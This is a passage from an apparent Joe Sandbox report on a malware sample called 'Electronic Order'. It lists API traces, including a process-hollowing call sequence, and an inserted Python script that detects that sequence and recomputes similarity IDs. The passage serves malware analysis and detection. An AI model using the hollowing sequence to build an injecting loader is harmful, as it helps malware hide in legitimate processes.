                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00DC49D2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                      • String ID:
                                      • API String ID: 1438897964-0
                                      • Opcode ID: 261c54fac58d9da5917ee06ecdcf9c44415c6271aa75f5395b1dc287a6fe94a1
                                      • Instruction ID: ca32a43b8790d21094bd69c68f254ef0ff959cf0f10a24f53ee30d58ea61a433
                                      • Opcode Fuzzy Hash: 261c54fac58d9da5917ee06ecdcf9c44415c6271aa75f5395b1dc287a6fe94a1
                                      • Instruction Fuzzy Hash: E7118C719183129FC700EF2ADC49A0AFBE8EF94710F00451EF499A72B1DB709549CBA2
                                      APIs
                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00DC5981,?,?,?,?), ref: 00DC5E27
                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00DC5981,?,?,?,?), ref: 00DFE19C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 522812750d40227a81ebbbeb29797d06ed9241f4f7ef848367e8089d2f1f9c0a
                                      • Instruction ID: 945918a9c1dae03daff725aeacc91d60fc8cab2f33b1bb32ec06a6d07519fab7
                                      • Opcode Fuzzy Hash: 522812750d40227a81ebbbeb29797d06ed9241f4f7ef848367e8089d2f1f9c0a
                                      • Instruction Fuzzy Hash: 29017970244709BEF7250E15DC86F76379CEB05768F14C319FAE56B1E0C6B46E858B60
                                      APIs
                                        • Part of subcall function 00DE594C: __FF_MSGBANNER.LIBCMT ref: 00DE5963
                                        • Part of subcall function 00DE594C: __NMSG_WRITE.LIBCMT ref: 00DE596A
                                        • Part of subcall function 00DE594C: RtlAllocateHeap.NTDLL(01590000,00000000,00000001,00000000,?,?,?,00DE1013,?), ref: 00DE598F
                                      • std::exception::exception.LIBCMT ref: 00DE102C
                                      • __CxxThrowException@8.LIBCMT ref: 00DE1041
                                        • Part of subcall function 00DE87DB: RaiseException.KERNEL32(?,?,?,00E7BAF8,00000000,?,?,?,?,00DE1046,?,00E7BAF8,?,00000001), ref: 00DE8830
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                      • String ID:
                                      • API String ID: 3902256705-0
                                      • Opcode ID: 2f0b142acd3530958669dcea8a5c86627b235c744bdb3dfdf64adab2306cfcb5
                                      • Instruction ID: 01728528240980f2795801546aa6bc4c58029e65704eae0357b8029b1f047edc
                                      • Opcode Fuzzy Hash: 2f0b142acd3530958669dcea8a5c86627b235c744bdb3dfdf64adab2306cfcb5
                                      • Instruction Fuzzy Hash: 12F0C83960039DA6CB20BA5AEC169DF7BACDF01351F500429FD08A6691DFB1CA8497F1
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: __lock_file_memset
                                      • String ID:
                                      • API String ID: 26237723-0
                                      • Opcode ID: 5da88490bacbead166213e62477c02d1488cc55c245288a274595113011ab568
                                      • Instruction ID: b489864ea5da377694bc96c679f230cf64ee34996c9185af8f10127b6db69470
                                      • Opcode Fuzzy Hash: 5da88490bacbead166213e62477c02d1488cc55c245288a274595113011ab568
                                      • Instruction Fuzzy Hash: 58018871C00685EBCF12BF679C0559F7B61EF403A4F148215F8185B1A5DB31CA11EBB1
                                      APIs
                                        • Part of subcall function 00DE8D68: __getptd_noexit.LIBCMT ref: 00DE8D68
                                      • __lock_file.LIBCMT ref: 00DE561B
                                        • Part of subcall function 00DE6E4E: __lock.LIBCMT ref: 00DE6E71
                                      • __fclose_nolock.LIBCMT ref: 00DE5626
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                      • String ID:
                                      • API String ID: 2800547568-0
                                      • Opcode ID: 8dc94b9227b7383745f57a11bdef809e6b29e8ddd92fc0d5106e4db0a4dd438f
                                      • Instruction ID: c84237ab07e9a80774e9824d91f7b907ced2f904697e56053a4fb834bf4e892a
                                      • Opcode Fuzzy Hash: 8dc94b9227b7383745f57a11bdef809e6b29e8ddd92fc0d5106e4db0a4dd438f
                                      • Instruction Fuzzy Hash: 12F02471800B809AD720BF779C0276E77A0AF013B8F54820DE428AB0C5CF7C8901AB71
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,00DC558F,?,?,?,?,?), ref: 00DC81DA
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,00DC558F,?,?,?,?,?), ref: 00DC820D
                                        • Part of subcall function 00DC78AD: _memmove.LIBCMT ref: 00DC78E9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$_memmove
                                      • String ID:
                                      • API String ID: 3033907384-0
                                      • Opcode ID: 859a5b3f6f2396fc72fb1e79a96db119c6b7d09a082e20f68982c66702e50345
                                      • Instruction ID: 563e28b8244e3fb7c1311b3fe5339dc5fb3c65afaebf1ccac694266e19f53dfb
                                      • Opcode Fuzzy Hash: 859a5b3f6f2396fc72fb1e79a96db119c6b7d09a082e20f68982c66702e50345
                                      • Instruction Fuzzy Hash: 17018B35201105BEEB256A26DD4AF7B7B6CEF8A760F10802AFD05DE291DE20D8009671
                                      APIs
                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 01581A5B
                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01581AF1
                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01581B13
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125986808.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                      • String ID:
                                      • API String ID: 2438371351-0
                                      • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                      • Instruction ID: fb989335526b8581443d8bfdc71fafa2e065fbdbe2843fb9fc8649fb7d4f4a63
                                      • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                      • Instruction Fuzzy Hash: EA12DD24E24658C6EB24DF64D8507DEB272FF68300F1090E9910DEB7A5E77A4F81CB5A
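The three calls in the record above (CreateProcessW, Wow64GetThreadContext, ReadProcessMemory, all from a region the dump marks "based on PE: false") are the opening half of a RunPE / process-hollowing loader, which matches the thread-injection and foreign-memory-write signatures this report raises. The script below is an added example, not part of the Joe Sandbox report and not Joe Security's code: it parses records in this report's "APIs" layout, flags the hollowing chain, and recomputes the Similarity "API ID" key. The key construction is an assumption inferred from the records visible here (CamelCase-split the API names, keep C-runtime names whole, drop the Get/Set prefixes and Ex/W suffixes, group tokens by call count, alphabetical within a group, groups joined with "$"); Joe Security does not document it. The sample input is constructed from three records copied from this page.

```python
"""Parse Joe Sandbox 'APIs' records: flag the process-hollowing API chain
and recompute the Similarity 'API ID' key.

Added example, not part of the report or of Joe Security's tooling. The API ID
construction is inferred from the records visible in this report (assumption).
"""
import re
from collections import Counter

# Constructed input: three 'APIs' records copied from this report.
SAMPLE = """\
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 01581A5B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01581AF1
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01581B13
Memory Dump Source
• Source File: 00000000.00000002.2125986808.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
APIs
  • Part of subcall function 00DC4D13: FreeLibrary.KERNEL32(00000000,?), ref: 00DC4D4D
  • Part of subcall function 00DE548B: __wfsopen.LIBCMT ref: 00DE5496
• LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00E862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00DC4F6F
  • Part of subcall function 00DC4CC8: FreeLibrary.KERNEL32(00000000), ref: 00DC4D02
  • Part of subcall function 00DC4DD0: _memmove.LIBCMT ref: 00DC4E1A
Memory Dump Source
• Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
APIs
• GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00DE09F4
  • Part of subcall function 00DC7D2C: _memmove.LIBCMT ref: 00DC7D66
Memory Dump Source
• Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
"""

# One API call line: optional "Part of subcall function XXXX:" prefix, then Name.MODULE
API_LINE = re.compile(r"•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
                      r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Z0-9]+)")
DROP = {"Get", "Set", "Ex", "W"}  # assumed stop-tokens, inferred from this report's API IDs
# Stages of the RunPE / hollowing chain; the report's injection signatures describe this shape
HOLLOWING = ({"CreateProcess"},
             {"GetThreadContext", "Wow64GetThreadContext"},
             {"ReadProcessMemory", "WriteProcessMemory"})


def parse_records(text):
    """Return one dict per 'APIs' record: called API names (in order) and its Source File line."""
    records, current = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            current = {"apis": [], "source": None}
            records.append(current)
        elif current is not None and s.startswith("• Source File:"):
            current["source"] = s[len("• Source File:"):].strip()
        elif current is not None:
            m = API_LINE.search(s)
            if m:
                current["apis"].append(m.group("name"))
    return records


def tokens(api):
    """CamelCase-split one API name; CRT names (leading underscore) stay one token."""
    if api.startswith("_"):
        return [api]
    return [p for p in re.findall(r"[A-Z][a-z0-9]*", api) if p not in DROP]


def api_id(apis):
    """Recompute the Similarity 'API ID': token groups by descending call count,
    alphabetical within a group, groups joined with '$' (inferred construction)."""
    counts = Counter(t for a in apis for t in tokens(a))
    groups = {}
    for tok, n in counts.items():
        groups.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(groups[n])) for n in sorted(groups, reverse=True))


def flag_hollowing(record):
    """True when a single function hits every stage of the hollowing chain."""
    names = {re.sub(r"(Ex)?[AW]?$", "", a) for a in record["apis"]}
    return all(stage & names for stage in HOLLOWING)


def analyse(text):
    """Per record: (api_id, hollowing chain present, dump region backed by a PE)."""
    out = []
    for r in parse_records(text):
        pe_backed = r["source"] is None or "based on PE: false" not in r["source"]
        out.append((api_id(r["apis"]), flag_hollowing(r), pe_backed))
    return out


if __name__ == "__main__":
    for rec, (aid, hollow, backed) in zip(parse_records(SAMPLE), analyse(SAMPLE)):
        print(f"{aid:45} hollowing={hollow!s:5} pe_backed={backed!s:5} apis={rec['apis']}")
```

Run against the three records the first one comes back as "Process$ContextCreateMemoryReadThreadWow64" with the hollowing flag set and no PE backing, the other two reproduce the "Library$Free$Load__wfsopen_memmove" and "LongNamePath_memmove" keys shown in this report. Recomputing the key from any API list makes it usable as a pivot across reports; the stop-token set is the part most likely to need widening once more records are checked.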
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 810f52481ffd6ce86e87dd7045c3a61bdb63c4415a387adc0640db6e9240454d
                                      • Instruction ID: 4b5f9e7661580dbbf1aa220400ef328d7e54f9209e19dc54919a33b9e7c40c7c
                                      • Opcode Fuzzy Hash: 810f52481ffd6ce86e87dd7045c3a61bdb63c4415a387adc0640db6e9240454d
                                      • Instruction Fuzzy Hash: 5F517C35700605AFCF14EB64C996FAE77A6EF84310F1481A9F946AB392CA30ED40CB71
                                      APIs
                                      • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00DC5CF6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      • Opcode ID: 27c810f5c2c8560f12aac949f44a81f2f630342f72aee02b78c08c58e26735fd
                                      • Instruction ID: a3206bffc1856306ab93ebdae144a9edc2eae07c4fdd6722fde4a8d3a408c9c9
                                      • Opcode Fuzzy Hash: 27c810f5c2c8560f12aac949f44a81f2f630342f72aee02b78c08c58e26735fd
                                      • Instruction Fuzzy Hash: AD313E71A00B0AAFCB18DF2DD584B6DB7B5FF44320F188619D81993714D771B9A0DBA0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ClearVariant
                                      • String ID:
                                      • API String ID: 1473721057-0
                                      • Opcode ID: 7cc45ab935ffacc6069f1661595acb9c678a2800d8e2d8b53f5b8485f3d5ab42
                                      • Instruction ID: 037108e1cae4b23803792b6c821442f91853313ae065fbcdd6bf42d06cadcb3f
                                      • Opcode Fuzzy Hash: 7cc45ab935ffacc6069f1661595acb9c678a2800d8e2d8b53f5b8485f3d5ab42
                                      • Instruction Fuzzy Hash: B341F574608351CFDB24DF18C484B1ABBE0BF45318F19889CE89A5B762C736E885CB62
                                      APIs
                                        • Part of subcall function 00DC4D13: FreeLibrary.KERNEL32(00000000,?), ref: 00DC4D4D
                                        • Part of subcall function 00DE548B: __wfsopen.LIBCMT ref: 00DE5496
                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00E862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00DC4F6F
                                        • Part of subcall function 00DC4CC8: FreeLibrary.KERNEL32(00000000), ref: 00DC4D02
                                        • Part of subcall function 00DC4DD0: _memmove.LIBCMT ref: 00DC4E1A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Library$Free$Load__wfsopen_memmove
                                      • String ID:
                                      • API String ID: 1396898556-0
                                      • Opcode ID: ecdb258fb04e0ee8653d7530e6d9d652e9f869651b7140bf74dc52a7a7e1a752
                                      • Instruction ID: dafd6ed8f8765608b30f6ce2e6f81d292d3894327476f5a17e0a1ba19cd62b2b
                                      • Opcode Fuzzy Hash: ecdb258fb04e0ee8653d7530e6d9d652e9f869651b7140bf74dc52a7a7e1a752
                                      • Instruction Fuzzy Hash: 3711E33160030AAACF10FF70DC66FAE77A9DF80711F20842DF942A71C5DA719A059BB0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ClearVariant
                                      • String ID:
                                      • API String ID: 1473721057-0
                                      • Opcode ID: 8a051d0c96e1d5083bdc6acb4a137a0270b5c6376143e4c786285d0bbfa74dd7
                                      • Instruction ID: 155b70be8b612ee9f6e7fb7fe43f6f19a1e97ea6568b73b94540fd800c0ae393
                                      • Opcode Fuzzy Hash: 8a051d0c96e1d5083bdc6acb4a137a0270b5c6376143e4c786285d0bbfa74dd7
                                      • Instruction Fuzzy Hash: 7821FF78608342DFCB14DF68C445B1ABBE4BB84718F09896CF98A57761D731E845CBA2
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID:
                                      • API String ID: 4104443479-0
                                      • Opcode ID: e0b0f1feff7007f9a685850875a5a6e1ea6a23f504afe070e1a0459631d1335c
                                      • Instruction ID: 7f6799573af75e8c2281223691f05534ed90bcbee892dace6991c71cd097cab7
                                      • Opcode Fuzzy Hash: e0b0f1feff7007f9a685850875a5a6e1ea6a23f504afe070e1a0459631d1335c
                                      • Instruction Fuzzy Hash: 1811A5722092176BC715AB2CD881F6AB79DEF49320718422EFD56C7290DF31AC109FB0
                                      APIs
                                      • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00DC5807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00DC5D76
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: ee1397170c46469c967ebd10ebb8f906046529226098928f3cb37b1666062734
                                      • Instruction ID: 8e5a1d6a88b1203259be89680e20b4a7f91f332951de3f704de93225f0d16511
                                      • Opcode Fuzzy Hash: ee1397170c46469c967ebd10ebb8f906046529226098928f3cb37b1666062734
                                      • Instruction Fuzzy Hash: 61112571200B029FD3208F15E888F62B7E9EB45760F14892EE4AB87A54D7B1F985CB60
                                      APIs
                                      • __lock_file.LIBCMT ref: 00DE4AD6
                                        • Part of subcall function 00DE8D68: __getptd_noexit.LIBCMT ref: 00DE8D68
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: __getptd_noexit__lock_file
                                      • String ID:
                                      • API String ID: 2597487223-0
                                      • Opcode ID: 4529e9b210220bdf501e779fefb68c204d8375e6f0d6d3ef47b71fce6a42d4c9
                                      • Instruction ID: b97c5e5ca00e55270b73879da5436c2f823c48c1b97f9dd7b55479727e710ed9
                                      • Opcode Fuzzy Hash: 4529e9b210220bdf501e779fefb68c204d8375e6f0d6d3ef47b71fce6a42d4c9
                                      • Instruction Fuzzy Hash: 17F031319402899BDB51BF668C0679E7661EF00329F188514B428AA1D1DB788951EF75
                                      APIs
                                      • FreeLibrary.KERNEL32(?,?,00E862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00DC4FDE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: 41a0e3e159e00813bf6f81bf43ed54e6aa87e54171b353f66aef951275ca1f66
                                      • Instruction ID: f98dda8b68242487887493614247dfff720a5ccc49287cbed4dfb33333148ddd
                                      • Opcode Fuzzy Hash: 41a0e3e159e00813bf6f81bf43ed54e6aa87e54171b353f66aef951275ca1f66
                                      • Instruction Fuzzy Hash: 49F03971105712CFCB349F65E4A4D12BBF1BF043293248A3EE5D683610C731A844DF60
                                      APIs
                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00DE09F4
                                        • Part of subcall function 00DC7D2C: _memmove.LIBCMT ref: 00DC7D66
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
